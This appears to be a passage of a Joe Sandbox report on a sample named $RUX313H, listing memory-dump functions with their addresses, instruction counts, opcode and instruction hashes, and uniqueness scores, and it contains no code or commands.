                                                                          • Snapshot File: hcaresult_1_2_3420000_$RUX313H.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: a81e1aa8b05a52a791b011501f2480090ceb71f9ae2128ed3769b6ce2db3fce9
                                                                          • Instruction ID: 2d9a8f62088691b4434ea23a138c243a5bacc22778adfedd194d72aba52b97f5
                                                                          • Opcode Fuzzy Hash: a81e1aa8b05a52a791b011501f2480090ceb71f9ae2128ed3769b6ce2db3fce9
                                                                          • Instruction Fuzzy Hash: E4817074A002158FCB44DF69C880AADFBB6EF84314F55859AE505AF3A1DB30ED82CB94
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 03422360, Relevance: .2, Instructions: 200COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.675351918.0000000003420000.00000040.00000001.sdmp, Offset: 03420000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_3420000_$RUX313H.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 3ef42a35db277b57a82a6d8f2809ce58d08624e0e9f48e7b6996720cc99fe1c4
                                                                          • Instruction ID: 02a569f0b322532f80aa77c7ace7fd870ab3a2d8c47eccf7fb70c6e201c6e530
                                                                          • Opcode Fuzzy Hash: 3ef42a35db277b57a82a6d8f2809ce58d08624e0e9f48e7b6996720cc99fe1c4
                                                                          • Instruction Fuzzy Hash: 25911874A10619CFCB48DFA9D49489DB7B2FF88314721C699E905AB329EB70ED49CF40
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 03427D68, Relevance: .2, Instructions: 198COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.675351918.0000000003420000.00000040.00000001.sdmp, Offset: 03420000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_3420000_$RUX313H.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 5f53079eb5df8b60f88a50123f1d9072847c15ceaa26f46e09d602af42ebb10a
                                                                          • Instruction ID: 06a15f5973b1487e3512fed0e25fd6cb66f731b484602b50a370ba343f435eb0
                                                                          • Opcode Fuzzy Hash: 5f53079eb5df8b60f88a50123f1d9072847c15ceaa26f46e09d602af42ebb10a
                                                                          • Instruction Fuzzy Hash: 1071F130A046249FCB04DF79D884A9EBBF2FF84208F558569E509EB395DF319D028BD0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0342BA98, Relevance: .2, Instructions: 175COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.675351918.0000000003420000.00000040.00000001.sdmp, Offset: 03420000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_3420000_$RUX313H.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 1ba2ae75fe522daf8bab1f607fd334a7bb46823777322c275f70d248f1efa88f
                                                                          • Instruction ID: 89b7fc58b6fb669e881e4afd2987152bb3c4ceef77e29e13d8c0fd1e2b551c3c
                                                                          • Opcode Fuzzy Hash: 1ba2ae75fe522daf8bab1f607fd334a7bb46823777322c275f70d248f1efa88f
                                                                          • Instruction Fuzzy Hash: 2F51E1357006109FD710CB65C840B6FBBEAEF85714F5580AAEA05AF394EB34EC0287A9
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0342D6D8, Relevance: .2, Instructions: 164COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.675351918.0000000003420000.00000040.00000001.sdmp, Offset: 03420000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_3420000_$RUX313H.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 4080d5343089338b1bf2b8332c2c936d64ed11d31cbe6def0488503e0050ae6a
                                                                          • Instruction ID: 0bb474bb8bd7d31ffcd27ec62948374038ad0583090cb895e532133db79859b9
                                                                          • Opcode Fuzzy Hash: 4080d5343089338b1bf2b8332c2c936d64ed11d31cbe6def0488503e0050ae6a
                                                                          • Instruction Fuzzy Hash: B5512339F00A308BCB28DB74945157EBBA2AFC5265729406EC92A9F750CF31DC02C7E5
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 03425470, Relevance: .2, Instructions: 164COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.675351918.0000000003420000.00000040.00000001.sdmp, Offset: 03420000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_3420000_$RUX313H.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 50f31f9136d721e43819dcaf50927505858669ced71dfd9ca569f61c401200d5
                                                                          • Instruction ID: 9b677429ec04aa9162b7ac700b8a2723aca673e7b5af46d7bcb6a4cbd0ff6fc7
                                                                          • Opcode Fuzzy Hash: 50f31f9136d721e43819dcaf50927505858669ced71dfd9ca569f61c401200d5
                                                                          • Instruction Fuzzy Hash: AF517B34B002148FCB04DF69D598A6EBBF2AF89304B6584A9E906EF365DB31DC44CF94
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 05CA3188, Relevance: .2, Instructions: 163COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.683429465.0000000005CA0000.00000040.00000001.sdmp, Offset: 05CA0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_5ca0000_$RUX313H.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 96b99c58f7d97527311c5d2f4a93a13ae0c18895600b8bccba01245899f46c47
                                                                          • Instruction ID: 79ac1b228996c996b0623bea1372c39b87599eff4cb6347adbfa3e1af2ad2a38
                                                                          • Opcode Fuzzy Hash: 96b99c58f7d97527311c5d2f4a93a13ae0c18895600b8bccba01245899f46c47
                                                                          • Instruction Fuzzy Hash: 0651C070E05346CFCB01DFB8C8645AAFFB1FFC5204B1489AAC508AB252DB309D46CBA1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 03425460, Relevance: .2, Instructions: 162COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.675351918.0000000003420000.00000040.00000001.sdmp, Offset: 03420000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_3420000_$RUX313H.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: fc2cf55bbdcbefe75b55bdefb0d8f091df5cbd626296563562660beb3f802577
                                                                          • Instruction ID: b2216762f30f5a36d6918385a93f9dfe178b2e0c62b4c700ea7d2f3ebfbd7d69
                                                                          • Opcode Fuzzy Hash: fc2cf55bbdcbefe75b55bdefb0d8f091df5cbd626296563562660beb3f802577
                                                                          • Instruction Fuzzy Hash: 1D516C34B002148FCB44DF69D498AAEBBF2AF89304B6585A9D906EB365DF31DC44CF94
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 05CA4F78, Relevance: .2, Instructions: 159COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.683429465.0000000005CA0000.00000040.00000001.sdmp, Offset: 05CA0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_5ca0000_$RUX313H.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 5ea870754abd86dca87e6458eac7aca50e8363d9d0302b6431ba7853834a3eb0
                                                                          • Instruction ID: 8c6eb94a4d4eb2a9375cf85e0184fea42a319158b02a1df914f9fed30d98d10e
                                                                          • Opcode Fuzzy Hash: 5ea870754abd86dca87e6458eac7aca50e8363d9d0302b6431ba7853834a3eb0
                                                                          • Instruction Fuzzy Hash: 3051BC717006119FCB04DFA9C884E6AFBB6BF84314B65C66AE1198F6A1DB31EC01CB95
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0342BCBF, Relevance: .2, Instructions: 159COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.675351918.0000000003420000.00000040.00000001.sdmp, Offset: 03420000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_3420000_$RUX313H.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 4ae46c67b866c0d41ed5e6e5f38dd2339a2b58c654eb89285eee72b442b93310
                                                                          • Instruction ID: a7e9883100dc92f65153046287f0e3e16f64ecf7f9d7a0fae163e0da99913997
                                                                          • Opcode Fuzzy Hash: 4ae46c67b866c0d41ed5e6e5f38dd2339a2b58c654eb89285eee72b442b93310
                                                                          • Instruction Fuzzy Hash: 9F51D2747082508FCB059B74D894BBE7FF2EFC9210F5984AAE506EB392DB349C058B95
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 05CA4760, Relevance: .2, Instructions: 155COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.683429465.0000000005CA0000.00000040.00000001.sdmp, Offset: 05CA0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_5ca0000_$RUX313H.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 47bdd8d93e8e51d575f9d18b1392a7ea1b6ac03f0d72362c176e42b7caa2c6dd
                                                                          • Instruction ID: caeb0113f3baa594b7b30d39171c8b8838ae1f6245a84578210fb15b422c472a
                                                                          • Opcode Fuzzy Hash: 47bdd8d93e8e51d575f9d18b1392a7ea1b6ac03f0d72362c176e42b7caa2c6dd
                                                                          • Instruction Fuzzy Hash: 39515575B106018FCB04DF69D488A9ABBF2FF8D714B6681A9E409EB761DB30EC45CB50
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 05CA39D3, Relevance: .2, Instructions: 152COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.683429465.0000000005CA0000.00000040.00000001.sdmp, Offset: 05CA0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_5ca0000_$RUX313H.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 90549e0107ebf4aa078e9a2a2bd6aee788a23f7676e4c734278effa65174bffe
                                                                          • Instruction ID: b8ec5bb7947857cd3f44f4f739656a24e1016bdb849ba8e71f5541d8c250a8bb
                                                                          • Opcode Fuzzy Hash: 90549e0107ebf4aa078e9a2a2bd6aee788a23f7676e4c734278effa65174bffe
                                                                          • Instruction Fuzzy Hash: 4C519E32B00151AFCB04EF98D494A69BBB3FF84708B56C969D409AF259CB70FC42CB94
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 05CA3A20, Relevance: .1, Instructions: 149COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.683429465.0000000005CA0000.00000040.00000001.sdmp, Offset: 05CA0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_5ca0000_$RUX313H.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 7c039065e2cfe6e5950d1f707fdd145be1a2c5a929870f58710a82ccaf0223e1
                                                                          • Instruction ID: f7a86c5acc07bbd651c6bd90309d6627c11687da454449c9fea24b03b29f6e25
                                                                          • Opcode Fuzzy Hash: 7c039065e2cfe6e5950d1f707fdd145be1a2c5a929870f58710a82ccaf0223e1
                                                                          • Instruction Fuzzy Hash: 4C51A232B04255AFC704EF98D898A69BBB3FF84308B56C959D4059F255DB70FC41CB94
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0342A330, Relevance: .1, Instructions: 148COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.675351918.0000000003420000.00000040.00000001.sdmp, Offset: 03420000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_3420000_$RUX313H.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 8ef98ed6ba6494ae980f080cf7c99ab8e02325151f62f982d196ee3d741a6d68
                                                                          • Instruction ID: d71668dfc85d7e58fb9de5addc629fc65c9f7c772da053ec03c926313dd55de3
                                                                          • Opcode Fuzzy Hash: 8ef98ed6ba6494ae980f080cf7c99ab8e02325151f62f982d196ee3d741a6d68
                                                                          • Instruction Fuzzy Hash: FD514C74A002149FCB14DF98D5C8D6DBBB2FF88310B55C49AE906AB365CB31EC02DBA5
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 03423E30, Relevance: .1, Instructions: 146COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.675351918.0000000003420000.00000040.00000001.sdmp, Offset: 03420000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_3420000_$RUX313H.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 4c6e511df85bd8a5b0c010ffae1f8144d6a3f235a3fc500fe63174478b10ac14
                                                                          • Instruction ID: ca0b4e626424697e322700729520b048663718fccdf4159a1bd4e8dcd4f1e143
                                                                          • Opcode Fuzzy Hash: 4c6e511df85bd8a5b0c010ffae1f8144d6a3f235a3fc500fe63174478b10ac14
                                                                          • Instruction Fuzzy Hash: D041F334B046228FCB15DF69E894A6FBBF2EB85604B91882EE505EF350EF75DD018784
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 03422A80, Relevance: .1, Instructions: 143COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.675351918.0000000003420000.00000040.00000001.sdmp, Offset: 03420000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_3420000_$RUX313H.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 116e813daa9363ae3411197251fbffc65f21302b504ca386f7c6865d26037f88
                                                                          • Instruction ID: 9f75904353415f280967a04972f2ed4ffd09875f556a725eb58a605a235c1904
                                                                          • Opcode Fuzzy Hash: 116e813daa9363ae3411197251fbffc65f21302b504ca386f7c6865d26037f88
                                                                          • Instruction Fuzzy Hash: 6551F634B006258BCB55DF69C4D4A6FBBE2EB846047A18A3DE506EF354EF70ED018B80
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 03423E60, Relevance: .1, Instructions: 143COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.675351918.0000000003420000.00000040.00000001.sdmp, Offset: 03420000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_3420000_$RUX313H.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: f2c21562b9ac208b33c21b816c9d8a7bf87c6bf8fec348ab21400999cc70140e
                                                                          • Instruction ID: 6d438860f318082c97f52614f706111422e09b4c043829b8a9c48250190dd5ad
                                                                          • Opcode Fuzzy Hash: f2c21562b9ac208b33c21b816c9d8a7bf87c6bf8fec348ab21400999cc70140e
                                                                          • Instruction Fuzzy Hash: 3241D434B046228BCB15DF39E494A6FBBF2EB85504791892ED60AEF350EF75ED018784
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 03427E20, Relevance: .1, Instructions: 141COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.675351918.0000000003420000.00000040.00000001.sdmp, Offset: 03420000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_3420000_$RUX313H.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 283dd559c9bf09ef5af51160870b1c66e032afd933b577d1cf4492c725519982
                                                                          • Instruction ID: 53f900483a9ed4c2c282cfa82d8627dda5ac658a6f3599db395ce4222c61638e
                                                                          • Opcode Fuzzy Hash: 283dd559c9bf09ef5af51160870b1c66e032afd933b577d1cf4492c725519982
                                                                          • Instruction Fuzzy Hash: 6F51AE30A10619DFCB04DFB9D488A9DBBB2FF84304F558A69E409EB255DF31AD15CB90
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 03429898, Relevance: .1, Instructions: 140COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.675351918.0000000003420000.00000040.00000001.sdmp, Offset: 03420000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_3420000_$RUX313H.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 435b1473ad28149cdffcf575de8ee95d200b811b5b4e3beb52c09470b5c7a6fc
                                                                          • Instruction ID: 39acab979f4eb0d073014c080a543d6e27b7601c2e3c71b814fe03f3b7bb11d9
                                                                          • Opcode Fuzzy Hash: 435b1473ad28149cdffcf575de8ee95d200b811b5b4e3beb52c09470b5c7a6fc
                                                                          • Instruction Fuzzy Hash: DA514F34A002198FCB44DF65C884A9AB7B2FF89304F55C269D50AAF365DB34EC45CF90
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 034298A0, Relevance: .1, Instructions: 138COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.675351918.0000000003420000.00000040.00000001.sdmp, Offset: 03420000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_3420000_$RUX313H.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 82c53ad189bceb508d9d5064fb23a857d0e131e9265c88bbe35fc718e4a1d81f
                                                                          • Instruction ID: f923178ed602b74d11007a5602aab8b4526baf9ddc9b600e686e41375cc846ce
                                                                          • Opcode Fuzzy Hash: 82c53ad189bceb508d9d5064fb23a857d0e131e9265c88bbe35fc718e4a1d81f
                                                                          • Instruction Fuzzy Hash: C5512D74A002198FCB44DF65C884A9AB7B2FF89704F55C2A9D50AAF3A5DB34EC45CF90
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0342B040, Relevance: .1, Instructions: 134COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.675351918.0000000003420000.00000040.00000001.sdmp, Offset: 03420000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_3420000_$RUX313H.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 80532e2456698bb28413e214a0849f70daec44d230138a6c82c8ce35506d6e46
                                                                          • Instruction ID: b7381878cc330c44f0377ab8d6979bd4965ae56edaf027bdad7e2cb5523aa8ed
                                                                          • Opcode Fuzzy Hash: 80532e2456698bb28413e214a0849f70daec44d230138a6c82c8ce35506d6e46
                                                                          • Instruction Fuzzy Hash: C14113307046209BCB14EB75C89467E77E3EF80615B65846EE993DF790DB39CC4293A1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 03422A70, Relevance: .1, Instructions: 134COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.675351918.0000000003420000.00000040.00000001.sdmp, Offset: 03420000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_3420000_$RUX313H.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 8bd88021f482c6ebccfb69bae6e53815407ab81df3c7292a2e99b6cce09aa1c0
                                                                          • Instruction ID: a3b62a701dd5f7ced4fc2877960289d120716312581bd7155b3b9d3581969015
                                                                          • Opcode Fuzzy Hash: 8bd88021f482c6ebccfb69bae6e53815407ab81df3c7292a2e99b6cce09aa1c0
                                                                          • Instruction Fuzzy Hash: AF41D8347006258BCB65DF69D4D4A6FBBE2EB88604791893EE906DB354EF70DD01CB84
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 05CA5E3A, Relevance: .1, Instructions: 133COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.683429465.0000000005CA0000.00000040.00000001.sdmp, Offset: 05CA0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_5ca0000_$RUX313H.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: f9c08a0b61083ebc03d4db2877243905c6c3b8f5659b17057eaa687c59a5bbab
                                                                          • Instruction ID: de9f8a24722ef124a7e3066d0816182f4e0a571f7555cc3cc4fb13462b3c4260
                                                                          • Opcode Fuzzy Hash: f9c08a0b61083ebc03d4db2877243905c6c3b8f5659b17057eaa687c59a5bbab
                                                                          • Instruction Fuzzy Hash: B05113797006019FCB04DF65D588E59FBF2FF88314B558199E91A8BB62CB30ED91CB80
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0342E720, Relevance: .1, Instructions: 131COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.675351918.0000000003420000.00000040.00000001.sdmp, Offset: 03420000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_3420000_$RUX313H.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: f10c7172dd59a5886d639fb4bc3392c079b8fa39b59c26947c5a1e5d476fead1
                                                                          • Instruction ID: ab8b055d5b49489682ea35263ac93fc6e1b5c5f52fa936ac7238a0feb4f77421
                                                                          • Opcode Fuzzy Hash: f10c7172dd59a5886d639fb4bc3392c079b8fa39b59c26947c5a1e5d476fead1
                                                                          • Instruction Fuzzy Hash: 2A514774B001158FDB04DF69C884AAEBBB6EFC4314B55849AE605EF3A1DB31EC42CB94
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 03421727, Relevance: .1, Instructions: 124COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.675351918.0000000003420000.00000040.00000001.sdmp, Offset: 03420000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_3420000_$RUX313H.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 2c83574bfbc59447f9f462d64042200ee011e4710ff947ae79739c2f2eb0723f
                                                                          • Instruction ID: 02bfe8218bfe83516bf1d8da69c7f3c61884ff8f12a8db672415f38a5ad019bb
                                                                          • Opcode Fuzzy Hash: 2c83574bfbc59447f9f462d64042200ee011e4710ff947ae79739c2f2eb0723f
                                                                          • Instruction Fuzzy Hash: 6941E2309097949FC711EF74D8A46DD7FB5EF86218F1280EAC041CB2A2EF355A05DB92
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0342A018, Relevance: .1, Instructions: 115COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.675351918.0000000003420000.00000040.00000001.sdmp, Offset: 03420000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_3420000_$RUX313H.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 62a81ab892576c39e43a21badb45343cfce81a4e7dd09c3b531a05bfa132c73d
                                                                          • Instruction ID: 9527c07664588c4572ca4b76680ab794074489c802e69943d862a4b54c80b6c5
                                                                          • Opcode Fuzzy Hash: 62a81ab892576c39e43a21badb45343cfce81a4e7dd09c3b531a05bfa132c73d
                                                                          • Instruction Fuzzy Hash: CA41E130A00225DBCB14CFA5D8806AEBBB2FF84314F54866AE905AF344DF71AD46CBD1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0342759D, Relevance: .1, Instructions: 115COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.675351918.0000000003420000.00000040.00000001.sdmp, Offset: 03420000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_3420000_$RUX313H.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 136c39ee46daca86d9a773b51ea54da0d374320d392ed5399a59d89370083e0c
                                                                          • Instruction ID: 4d551edbd400bb93ba6b38f489e70510e6699ab76bb86652a8ef1456584a6078
                                                                          • Opcode Fuzzy Hash: 136c39ee46daca86d9a773b51ea54da0d374320d392ed5399a59d89370083e0c
                                                                          • Instruction Fuzzy Hash: D4419B70B002169FCB04DF69D885AAEBBF6FF88204B108528E109DB361EB70ED05CB90
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0342A258, Relevance: .1, Instructions: 106COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.675351918.0000000003420000.00000040.00000001.sdmp, Offset: 03420000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_3420000_$RUX313H.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 303844a641bb7426fa2be874aea2754dc32cdf2b8cf5095c7c349ae92300ae58
                                                                          • Instruction ID: be5de80a6d296f2eb4b9e76729cebfe36d191b9a4827819a12211da4d3c5d8dc
                                                                          • Opcode Fuzzy Hash: 303844a641bb7426fa2be874aea2754dc32cdf2b8cf5095c7c349ae92300ae58
                                                                          • Instruction Fuzzy Hash: 1241F531A042149FC710EF68D888B5FBBB2EF84300F55C99AE505DB351DB30AD06CBA5
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 05CA1430, Relevance: .1, Instructions: 104COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.683429465.0000000005CA0000.00000040.00000001.sdmp, Offset: 05CA0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_5ca0000_$RUX313H.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 772c50c711f097f74ee3d281567c80f01c7975a498f04fcbcb96d580ce0190f5
                                                                          • Instruction ID: 3f243ce32692e8a816af82c2b3cc0ee93c53062133309be56cdb436daca063da
                                                                          • Opcode Fuzzy Hash: 772c50c711f097f74ee3d281567c80f01c7975a498f04fcbcb96d580ce0190f5
                                                                          • Instruction Fuzzy Hash: 263152317082104FC705ABB9A4A456EBBE7AFC6A58369886ED509DF391CF35CC0783A5
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 03421D50, Relevance: .1, Instructions: 101COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.675351918.0000000003420000.00000040.00000001.sdmp, Offset: 03420000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_3420000_$RUX313H.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 9a97c3c9baa46beaad22e066368cced17f04560c22fa51cedff886996c36d64a
                                                                          • Instruction ID: fa5ac51f7951f7ca9df9d9f54f2d013cf65bea878ac923f6b3bc631d73eb8b97
                                                                          • Opcode Fuzzy Hash: 9a97c3c9baa46beaad22e066368cced17f04560c22fa51cedff886996c36d64a
                                                                          • Instruction Fuzzy Hash: EF3126703141119FC304CB28D898E6ABBE5FF89A24B6142A9E519DF3B1DF31EC00CB91
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 034261C6, Relevance: .1, Instructions: 95COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
